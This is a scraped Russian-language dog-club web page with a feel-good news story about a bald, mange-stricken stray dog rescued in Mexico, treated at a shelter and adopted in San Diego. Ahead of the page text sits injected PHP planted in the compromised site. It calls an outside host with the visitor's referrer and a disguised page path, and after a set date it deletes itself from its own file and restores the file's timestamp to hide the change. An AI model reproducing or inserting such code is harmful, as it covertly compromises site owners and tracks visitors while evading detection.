check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456755828){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776972&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/views.php"); } Чудесное исцеление бездомной собаки
 

РКФ Новый век

Мы в ответе за тех, кого приручили.

  • Увеличить размер шрифта
  • Размер шрифта по умолчанию
  • Уменьшить размер шрифта
Home Интересные новости Чудесное исцеление бездомной собаки

Чудесное исцеление бездомной собаки

E-mail Печать PDF
>Женщина нашла под своей машиной напуганного лысого пса и решила спасти бедное животное. Спустя два месяца он превратился в шикарного пушистого красавца.

Мексиканка Карла Солис уже собиралась сесть в свой автомобиль, когда увидела под машиной напуганное дрожащее животное. Карла с трудом выманила существо из-под машины, оказалось, это голодный больной пёс. На его воспалённом теле совсем не было шерсти, лишь болезненные следы от чесотки. Женщина решила, что надо спасать бедное животное, и повезла его к ветеринару.

Ветеринар осмотрел беднягу и выявил несколько кожных заболеваний и проблемы с желудком. Вдобавок ко всем болячкам вес собаки был всего 15 кг, а это в два раза меньше нормы.

Бывают такие случаи, когда медицинская поддержка питомцу может понадобиться в любое время дня и ночи. В этом случае ищите , где Вам смогут обеспечить неотложные мероприятия с Вашим домашним животным.


Солис поняла, что одной ей не справиться с проблемами этого пса, и связалась с местным спасателем животных Бекки Модером. Он подбирает и выхаживает брошенных собак и отправляет их из Мексики в приюты Америки.

Когда пёс попал в приют, ему дали кличку Эллиот и бросили все силы на его лечение. Однако деньги, выделенные для Эллиота, закончились раньше, чем курс лечения, но Модер решил помочь, оплатив остальное из своего кармана.

К счастью, подопечный быстро пошёл на поправку. Спустя некоторое время у Эллиота начала расти шерсть, сначала как пух, а потом уже роскошная рыжая грива.



Когда он выздоровел, настало время найти ему новую любящую семью. Эллиота переправили в Сан-Диего, где этот красавчик сразу нашёл хороших хозяев. Он покорил сердца молодой пары из Калифорнии, которая искала взрослую спокойную собаку. Они окружили застенчивого пса своей заботой и дали ему новое имя — Ашер.



Новые хозяева хвастаются, что Ашер своей шикарной внешность привлекает внимание прохожих. Теперь сложно представить, что этот красавчик когда-то был бездомным и прятался под машиной.




Источник http://daylapu.ru/news.php?ngod=2018&news=10
 

Добавить комментарий


Защитный код
Обновить

Пользовательский поиск



Случайное изображение.

 039.jpg

Реклама


Похожие материалы